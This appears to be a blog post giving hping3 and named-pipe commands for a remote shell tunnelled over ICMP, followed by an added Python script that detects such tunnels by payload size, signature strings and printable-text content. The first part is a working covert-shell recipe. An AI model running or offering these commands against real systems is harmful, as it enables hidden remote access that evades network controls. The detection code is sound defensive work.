There may be a tighter way to accomplish this, but these are the basic steps for setting up a remote shell over ICMP.
First, on the remote system we set up two named pipes and attach them to the STDIN and STDOUT of a shell:
mknod /tmp/in p    # depending on your system you may have to use mkfifo
mknod /tmp/out p
bash </tmp/in >/tmp/out 2>&1
Next, direct the STDOUT of a listening hping into the "in" pipe on the remote system, and start an outgoing hping that reads from the "out" pipe:
hping3 [LOCAL_BOX_IP] --listen MSGIDIN -I eth0 --icmp > /tmp/in &
hping3 [LOCAL_BOX_IP] --sign MSGIDOUT -I eth0 --icmp -d 1200 --file /tmp/out &
Now we move to the local system: start a listening hping to receive the output from the remote box, then make another named pipe for an outgoing hping to read, which we'll use to send commands to the remote system:
hping3 [REMOTE_BOX_IP] --listen MSGIDOUT -I eth0 --icmp &
mknod /tmp/out p
hping3 [REMOTE_BOX_IP] --sign MSGIDIN -I eth0 --icmp -d 1200 --file /tmp/out &
Now all you have to do is send commands to the named pipe on the local system (don't worry about the lack of a prompt). Here hostname is the command typed, and remote.example.com is the output that comes back:
cat > /tmp/out
hostname
remote.example.com
Tada! It's a little messy, you might end up with some duplicated output — but it works.
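The same properties that make this channel work also make it stand out on the wire: hping sends echo requests carrying 1200-byte payloads (the -d 1200 above), each starting with the --sign string, and the bytes after it are typed commands and their output. The following Python is an added example written for this page, not code from the original post or from hping: it parses raw IPv4/ICMP echo packets (constructed inline as sample input) and flags any whose payload is far larger than the 56 bytes a stock Linux ping carries, contains a known signature string, or is mostly printable multi-line text. The signature strings MSGIDIN and MSGIDOUT come from the post; a defender would normally not know them in advance, so the size and content heuristics carry the detection. The 64-byte threshold, the 0.95 printable ratio and the sample addresses are assumptions.

```python
"""Flag ICMP echo traffic that looks like a tunnelled shell rather than an ordinary ping.

Heuristics (assumptions for this example, not from the original post or from hping):
  * payload far larger than the 56 bytes a stock Linux ping carries (32 on Windows)
  * payload containing a known hping --sign string (MSGIDIN / MSGIDOUT in the post)
  * payload that is mostly printable, multi-line text, as command output tends to be
"""
import struct

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0
NORMAL_PING_PAYLOAD = 64             # bytes; above this is suspicious (assumed threshold)
MARKERS = (b"MSGIDIN", b"MSGIDOUT")  # signatures from the post; usually unknown to a defender


def build_frame(src, dst, payload, icmp_type=ICMP_ECHO_REQUEST, proto=1):
    """Build a minimal IPv4 packet carrying ICMP (checksums left zero; constructed test input)."""
    ip_hdr = struct.pack(
        "!BBHHHBBH4s4s", 0x45, 0, 20 + 8 + len(payload), 0, 0, 64, proto, 0,
        bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")),
    )
    icmp_hdr = struct.pack("!BBHHH", icmp_type, 0, 0, 1, 1)  # type, code, checksum, id, seq
    return ip_hdr + icmp_hdr + payload


def parse_ipv4_icmp(frame):
    """Return (src, dst, icmp_type, payload) for an IPv4 echo request/reply, else None."""
    if len(frame) < 20 or frame[0] >> 4 != 4 or frame[9] != 1:
        return None
    ihl = (frame[0] & 0x0F) * 4
    src = ".".join(str(b) for b in frame[12:16])
    dst = ".".join(str(b) for b in frame[16:20])
    icmp = frame[ihl:]
    if len(icmp) < 8 or icmp[0] not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        return None
    return src, dst, icmp[0], icmp[8:]


def tunnel_indicators(payload, markers=()):
    """Return the reasons a single echo payload looks like tunnelled shell traffic."""
    reasons = []
    if len(payload) > NORMAL_PING_PAYLOAD:
        reasons.append(f"oversized payload ({len(payload)} bytes)")
    for marker in markers:
        if marker in payload:
            reasons.append(f"known signature {marker.decode()!r}")
    text = payload.rstrip(b"\x00")   # drop zero padding before judging the text content
    if text:
        printable = sum(1 for b in text if 32 <= b < 127 or b in (9, 10, 13))
        if printable / len(text) > 0.95 and b"\n" in text:
            reasons.append("mostly printable multi-line text")
    return reasons


def scan(frames, markers=()):
    """Run the heuristics over raw frames; return (src, dst, icmp_type, reasons) per flagged packet."""
    alerts = []
    for frame in frames:
        parsed = parse_ipv4_icmp(frame)
        if parsed is None:
            continue
        src, dst, icmp_type, payload = parsed
        reasons = tunnel_indicators(payload, markers)
        if reasons:
            alerts.append((src, dst, icmp_type, reasons))
    return alerts


# Constructed sample traffic (addresses are private/documentation ranges, not real hosts).
SAMPLE_FRAMES = [
    # stock Linux ping: 8-byte timestamp plus the 0x10..0x3f fill pattern, 56 bytes in all
    build_frame("10.0.0.5", "10.0.0.1", bytes(8) + bytes(range(0x10, 0x40))),
    # command going out: signature plus typed command, padded to hping's -d 1200
    build_frame("10.0.0.5", "203.0.113.9", (b"MSGIDIN" + b"hostname\n").ljust(1200, b"\x00")),
    # output coming back (hping sends echo requests in both directions by default)
    build_frame("203.0.113.9", "10.0.0.5", (b"MSGIDOUT" + b"remote.example.com\n").ljust(1200, b"\x00")),
    # IPv4 packet with protocol 17 (UDP) and a large body: not ICMP, so the parser skips it
    build_frame("10.0.0.5", "10.0.0.1", b"A" * 1200, proto=17),
]

if __name__ == "__main__":
    for src, dst, icmp_type, reasons in scan(SAMPLE_FRAMES, MARKERS):
        print(f"{src} -> {dst} (ICMP type {icmp_type}): " + "; ".join(reasons))
```

Run as-is it reports the two 1200-byte frames and stays silent on the stock ping and the non-ICMP packet. Feeding it real captures needs only a replacement for SAMPLE_FRAMES (for example the IPv4 payload of each Ethernet frame from a pcap); the size check alone would catch the setup in this post, since nothing in a normal ping conversation carries 1200 bytes of data per packet in both directions.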